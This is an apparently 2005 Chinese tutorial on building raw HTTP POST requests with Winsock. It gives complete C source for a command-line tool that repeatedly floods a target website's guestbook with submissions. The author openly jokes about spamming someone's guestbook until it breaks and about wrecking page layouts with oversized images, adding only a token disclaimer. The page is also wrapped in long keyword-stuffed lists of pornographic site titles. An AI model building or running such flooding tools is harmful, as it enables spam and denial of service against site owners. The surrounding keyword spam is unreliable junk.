国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

用Winsock實現對網站數據庫的數據注入
2005-12-17   

在寫這篇文章之前,有必要對"注入"一詞闡述一下。區別于通常的SQL注入,這里的注入實際上只是構造HTTP請求報文,以程序的方式代替WEB提交頁面,實現數據的自動提交。嘿嘿,說到這,我看到你詭異的笑容了,我們只要寫個循環,用什么語言你說了算,向特定的WEB頁面發送HTTP報文,只要幾分鐘,呵呵他的本本就爆了,而且......嘿、嘿、嘿......偶喝杯茶,接下再寫。
首先,還是溫習一下HTTP協議吧。我們在打開一個網站時,比如說http://www.163.com,實際上IE作為一個客戶端,它將向服務器發送如下的請求報文(偶用sniffer截得的):
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: www.163.com
Connection: Keep-Alive
Cookie: NETEASE_SSN=jsufcz; NETEASE_ADV=11&22; Province=0; City=0; NTES_UV_COOKIE=YES
我們看到在以上的報文中,有很多字段,當然其中有很多并不是必須的,如果我們自己編程,只關心必要的就行了。在HTTP/1.1協議中規定了最小請求消息由方法字段(GET/POST/HEAD)和主機字段(HOST)構成。如上面的
GET / HTTP/1.1
HOST:www.163.com
但在HTTP/1.0中,HOST字段并不是必須的,這里為什么不能省,相信你也知道,不曉得的話也不打緊,接下來看。
為了向服務器發送數據,瀏覽器通常采用GET或POST方法向服務器提交報文。服務器在收到報文之后,解碼分析出所需的數據并進行處理,最后返回結果。通常我們可以見到諸如http://xxx.xxx.xxx.xxx/show.asp?id=xxx的URL請求,我們可以自己構造如下的報文來完成
GET /show.asp?id=xxx HTTP/1.1
HOST:xxx.xxx.xxx.xxx
受URL長度1024的限制,采用GET方法只能提交少量的數據,假如我們在錄入一篇文章時,這時就只能用到POST方法了。在講解POST方法的一些要點之前,還是讓大家來看一段POST請求報文,以致對POST報文有個大致的了解。(下面是我向某本本的留言,偶照樣用sniffer截下來了)
POST /gbook/add.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwav
e-flash, */*
Referer: http://218.76.65.47/gbook/add.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 218.76.65.47
Content-Length: 115
Connection: Keep-Alive
name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say.gif&comment=test&passw
ord=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4
與GET方法相比,在字段下面多了一段內容,這就是我們向留言本提交的數據,如果有中文須經過urlencode編碼。同樣讓我們省去不必要的字段,構造一個最小的POST請求
POST /gbook/add.php HTTP/1.1
Host: 218.76.65.47
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say.gif&comment=test&passw
ord=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4
上面的Content-Type字段表示為POST表單型的,Content-Length當然就是表示實體數據的長度了,這里都不能少,不然就無法正確接收了。這樣,服務器端處理頁面就會收到你提交的數據,并接收處理,如果是留言本的話就寫入數據庫了。若以很快的速度向某個本本發送這樣的報文,實際上那個本本己經被你狂灌水了。
嗚嗚嗚,看上面偶都不知道講了些什么,亂不拉幾的,就是偶也想盡量講得清楚點,無耐高考語文沒及格,就成這樣了咯,還望哥哥姐姐們見諒見諒。講了客戶端的發送,接下來就該講服務器的接收問題了。
當報文數據到達服務器后,服務器底層進程進行接收并放入特定的緩沖區,同時置一些環境變量,如"CONTENT_LENGTH"、"QUERY_STRING"等,當然這其間還是屏蔽了一些底層細節的,如客戶端提交的數據是怎么被重置到被請求頁的標準輸入的,偶也弄不清楚,嘿嘿要能弄清楚了,偶就寫操作系統去。之后高層應用程序如CGI、ASP、PHP等對其進行數據提取,其中CGI還須自己進行Unencode解碼和字符串提取。假如向一ASP本本寫留言,我提交了姓名(name)和內容(body)字段,且采用POST表單方式提交,在ASP程序中應如下進行接收:
name=request.form("name")
body=request.form("body")
并添加到數據庫中
rs.addnew
rs("name")=name
rs("body")=body
rs.update
到此,該講的也基本上講完了,但有一點還要注意下,在發送報文時,在實體內容中還須加入提交按鈕的"name=value"URLEncode編碼,否則有可能不會寫入數據庫,Why ?I am finding the reason!
 
 
以下是相關的源代碼:
/*    encode.h    */
/* Unencode URL編碼函數 */
/*
在這里要注意,編譯器在處理中文字符時,會自動根據字符的位7來讀入一個
或兩個字符,這時可以強制采用unsigned char *來讀入一個字符。
*/
int isT(char ch)
{
if(ch==' '||ch=='%'||ch=='/'||ch&0x80) return 1;
else return 0;
}
int encode(char *s,char *d)
{
if(!s||!d) return 0;
for(;*s!=0;s++)
{
unsigned char *p=(unsigned char*)s;
if(*p==' ')
{
*d='%';
*(d+1)='2';
*(d+2)='0';
d+=3;
}
else if(isT(*p))
{
char a[3];
*d='%';
sprintf(a,"%02x",*p);
*(d+1)=a[0];
*(d+2)=a[1];
d+=3;
}
else
{
*d=*p;
d++;
}
}
*d=0;
return 1;
}
/* Unencode URL解碼函數 */
int unencode(char *s,char *d)
{
if(!s||!d) return 0;
for(;*s!=0;s++)
{
if(*s=='+')
{
*d=' ';
d++;
}
else if(*s=='%')
{
int code;
if(sscanf(s+1,"%02x",&code)!=1) code='?';
*d=code;
s+=2;
d++;
}
else
{
*d=*s;
d++;
}
}
*d=0;
return 1;
}
/*  booksend.cpp  */
/*    報文發送程序    */
#include
#include
#include "encode.h"
#include
#pragma comment(lib,"ws2_32.lib")
int checkpra(int argc,char *argv[]);
void usage();
DWORD WINAPI senddata(LPVOID lp);
char ip[20]={0};
USHORT port=0;
char page[128]={0};
char value[1024]={0};
int ttime=1;
int delaytime=2000;
SOCKET sock;
struct sockaddr_in sin;
char sendbuf[1024*4]={0};
void main(int argc,char *argv[])
{
if(checkpra(argc,argv)==-1) return;
WSADATA wsa;
if(WSAStartup(0x0202,&wsa)!=0)
{
printf("WSAStartup failed with error:%d\n",GetLastError());
return;
}
sin.sin_family=AF_INET;
if(inet_addr(ip)!=INADDR_NONE)
sin.sin_addr.s_addr=inet_addr(ip);
else
{
struct hostent *phost=gethostbyname(ip);
if(phost==NULL)
{
printf("Resolve %s error!\n",ip);
return;
}
memcpy(&sin.sin_addr,phost->h_addr_list[0],phost->h_length);
}
sin.sin_port=htons(port);
char tempbuf[1024]={0};
sprintf(tempbuf,"POST %s HTTP/1.1\n",page);
strcpy(sendbuf,tempbuf);
memset(tempbuf,0,sizeof(tempbuf));
sprintf(tempbuf,"HOST: %s\n",ip);
strcat(sendbuf,tempbuf);
strcat(sendbuf,"Accept: image/gif, */*\n");
strcat(sendbuf,"Content-Type: application/x-www-form-urlencoded\n");
memset(tempbuf,0,sizeof(tempbuf));
sprintf(tempbuf,"Content-Length: %d\n",strlen(value));
strcat(sendbuf,tempbuf);
strcat(sendbuf,"Connection: Keep-Alive\n\n");
strcat(sendbuf,value);
for(int i=0;i    {
CreateThread(NULL,0,senddata,&i,0,NULL);
Sleep(delaytime);
}
WSACleanup();
}
DWORD WINAPI senddata(LPVOID lp)
{
SOCKET sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==INVALID_SOCKET)
{
printf("Socket() failed with error:%d\n",GetLastError());
return -1;
}
int ret;
printf("State:Connecting...\n");
ret=connect(sock,(struct sockaddr*)&sin,sizeof(sin));
if(ret==SOCKET_ERROR)
{
printf("Connect() failed with error:%d\n",GetLastError());
return -1;
}
printf("State:Connected!\n");
printf("State:Sending...time %d ",*(int*)lp+1);
ret=send(sock,sendbuf,strlen(sendbuf)+1,0);
if(ret>0)
printf("Send success!\n");
else
printf("Send error!\n");
char recvbuf[1024*10]={0};
ret=recv(sock,recvbuf,sizeof(recvbuf),0);
if(strstr(recvbuf,"100")||strstr(recvbuf,"200")||strstr(recvbuf,"302"))
printf("呵呵,注入成功啦!\n\n");
else
printf("注入有點問題哦,請查實一下!\n\n");
closesocket(sock);
return 1;
}
void usage()
{
char pathname[128]={0};
GetModuleFileName(NULL,pathname,sizeof(pathname));
char *p=pathname+strlen(pathname)-1;
for(;*p!='\\';p--);
printf("-------------------------------------------------------------------------------\n");
printf("Usage:%s ip port page value [times] [delay]\n",p+1);
printf("Code by JsuFcz--http://jsufcz.21xcn.net\n");
printf("Ex:%s 10.0.0.169 80 /guestbk/add.php name=abc-body=hehe-doadd=發送留言",p+1);
printf("-------------------------------------------------------------------------------\n");
}
int checkpra(int argc,char *argv[])
{
if(argc<5)
{
printf("錯誤的用法:至少應使用4個參數\n\n");
usage();
return -1;
}
else if(argc>6)
{
printf("錯誤的用法:最多只有6個參數\n\n");
usage();
return -1;
}
if(argc==6)
{
ttime=atoi(argv[5]);
}
if(argc==7)
{
ttime=atoi(argv[5]);
delaytime=atoi(argv[6]);
}
strcpy(ip,argv[1]);
port=atoi(argv[2]);
strcpy(page,argv[3]);
for(int i=0;argv[4][i]!=0;i++)
{
if(argv[4][i]=='-') argv[4][i]='&';
if(argv[4][i]=='\'') argv[4][i]=' ';
}
encode(argv[4],value);
return 0;
}
以上代碼已在VC6上編譯通過,你也可以到本人個人主頁上(http://jsufcz.21xcn.net)下載到源代碼和命令行程序。
在文章的最后,偶還有一點心得要與大家分享。在留言本中如果有提交表情或是圖片之類的,由于本本的相對鏈接的限制,只要是本本目錄下的圖片資源,偶們就可以隨便拿來貼,這樣如果某個圖片的盡寸很大的話,本本的版面就被你弄壞了。
(申明:本文章是偶拿來供感興趣的技術業朋友分享的,若有人用于非法企圖,偶可不管咯)

熱詞搜索:

上一篇:Access的跨庫查詢
下一篇:phparticle 2.0注入漏洞測試分析

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
国产精品乡下勾搭老头1| 日本一区免费视频| 99re这里只有精品6| 成人动漫av在线| 成人综合婷婷国产精品久久 | 免费观看成人鲁鲁鲁鲁鲁视频| 夜夜嗨av一区二区三区网页| 亚洲品质自拍视频| 亚洲成精国产精品女| 五月天激情综合| 精久久久久久久久久久| 国产一区二区影院| 91视频在线观看| 欧美肥胖老妇做爰| 精品不卡在线视频| 自拍偷拍亚洲激情| 性做久久久久久| 精品在线观看免费| 成人精品免费看| 在线91免费看| 成人欧美一区二区三区小说 | 99国产欧美久久久精品| 欧美三区在线观看| 国产精品国产a| 秋霞午夜av一区二区三区| 风间由美一区二区av101 | 最新日韩在线视频| 免费高清视频精品| 99久久久久久| 久久在线观看免费| 亚洲国产cao| 91一区二区三区在线观看| 亚洲精品一区二区三区精华液 | 91高清在线观看| 亚洲欧美在线视频| 成人精品电影在线观看| 欧美一区二视频| 亚洲成av人片一区二区| 91久久人澡人人添人人爽欧美| 久久久久久免费网| 激情小说亚洲一区| 7777精品伊人久久久大香线蕉经典版下载 | 日韩一区二区三区视频在线观看| 樱桃视频在线观看一区| 高清日韩电视剧大全免费| 26uuu另类欧美| 国产成人精品三级| 亚洲国产精品成人综合色在线婷婷 | 丁香桃色午夜亚洲一区二区三区| 久久久综合九色合综国产精品| 蜜桃在线一区二区三区| 日韩视频免费观看高清完整版在线观看 | 久久影院午夜论| 国产91在线|亚洲| 亚洲久草在线视频| 欧美一区二区三区在线观看视频| 奇米四色…亚洲| 国产色91在线| 欧美日韩国产高清一区二区三区| 日韩精品欧美成人高清一区二区| 91精品国产一区二区三区蜜臀| 久久成人免费网站| 国产精品不卡在线| 欧美日韩亚洲综合一区| 国产剧情av麻豆香蕉精品| 国产精品毛片大码女人| 欧美日韩一区中文字幕| 国产美女一区二区| 一二三区精品福利视频| 日韩视频中午一区| 在线观看亚洲a| 国产高清一区日本| 蜜桃一区二区三区四区| 亚洲一区二区三区四区在线观看 | 4438亚洲最大| 欧美三级日韩三级| 91免费观看在线| 丰满放荡岳乱妇91ww| 久久99国产精品麻豆| 亚洲国产视频直播| 亚洲欧美日韩国产中文在线| 亚洲精品在线电影| 日韩一区二区中文字幕| 91成人在线免费观看| aaa亚洲精品一二三区| 菠萝蜜视频在线观看一区| 国产精品亚洲第一区在线暖暖韩国| 五月天激情综合网| 视频在线观看91| 免费高清视频精品| 久久国产欧美日韩精品| 国产精品亚洲人在线观看| 国产一区二区三区av电影| 狠狠v欧美v日韩v亚洲ⅴ| 青青草国产精品97视觉盛宴| 亚洲成人手机在线| 久久成人免费电影| 亚洲视频免费在线| 欧美一区二区三区四区在线观看| 欧美在线一区二区三区| 欧美中文字幕亚洲一区二区va在线| 色综合久久中文字幕综合网| 91九色02白丝porn| 91精品国产欧美一区二区18| 日韩欧美中文字幕精品| 久久蜜桃av一区精品变态类天堂| 欧美国产欧美综合| 午夜av电影一区| 国产91富婆露脸刺激对白| 91黄色小视频| 精品对白一区国产伦| 亚洲欧洲www| 韩日欧美一区二区三区| 色婷婷综合久久久久中文一区二区| 欧美性videosxxxxx| 欧美韩日一区二区三区四区| 亚洲男人的天堂在线观看| 精品一区二区三区不卡| 欧日韩精品视频| 中文字幕一区二区三区色视频| 喷白浆一区二区| 欧美午夜精品久久久久久超碰| 久久久亚洲精华液精华液精华液| 亚洲午夜视频在线观看| 99久久精品免费看国产免费软件| 2017欧美狠狠色| 久草在线在线精品观看| 91精品国产综合久久小美女| 亚洲曰韩产成在线| 9i在线看片成人免费| 欧美国产综合一区二区| 国产成人在线视频免费播放| 精品成人免费观看| 国产一区日韩二区欧美三区| 日韩精品专区在线影院观看 | 国产资源精品在线观看| 欧美哺乳videos| 国产乱国产乱300精品| 国产精品女主播av| 成人精品免费视频| 日韩毛片视频在线看| 欧美三级日韩在线| 精品一区二区三区在线观看 | 国产一区 二区 三区一级| 337p粉嫩大胆噜噜噜噜噜91av| 国产伦精品一区二区三区视频青涩| 久久夜色精品国产噜噜av| 成人性生交大片免费| 亚洲欧美另类在线| 日韩一级片在线播放| 国产 日韩 欧美大片| 一区二区三区不卡视频在线观看| 欧美日韩精品电影| 国产一区二区在线影院| 一区二区视频在线看| 91精品国产综合久久久蜜臀图片| 国产精品1区2区3区在线观看| 国产精品乱子久久久久| 欧美一级黄色录像| 欧美综合久久久| 国产精品一线二线三线精华| 亚洲免费视频成人| 久久九九99视频| 日韩欧美一级二级| 在线观看日韩一区| jvid福利写真一区二区三区| 久久99国产精品久久| 首页亚洲欧美制服丝腿| 亚洲激情男女视频| 欧美国产禁国产网站cc| 久久精品日产第一区二区三区高清版| 欧美怡红院视频| 在线免费不卡电影| 91精品办公室少妇高潮对白| 懂色av一区二区三区免费观看| 麻豆国产精品777777在线| 蜜臀精品久久久久久蜜臀| 日韩精品每日更新| 久久99久久久久| 国产又黄又大久久| 国产成人免费视频网站| 国产成人8x视频一区二区 | 欧美一级欧美三级在线观看| 欧美一区二视频| 久久精品免视看| 中文字幕中文字幕一区| 亚洲男同性视频| 三级精品在线观看| 精一区二区三区| 成人一区二区视频| 欧美三片在线视频观看| 欧美成人女星排名| 亚洲三级电影网站| 美日韩一级片在线观看| 国产不卡一区视频| 欧美喷潮久久久xxxxx| 国产无遮挡一区二区三区毛片日本| 中文天堂在线一区| 青青草91视频| 91视频com|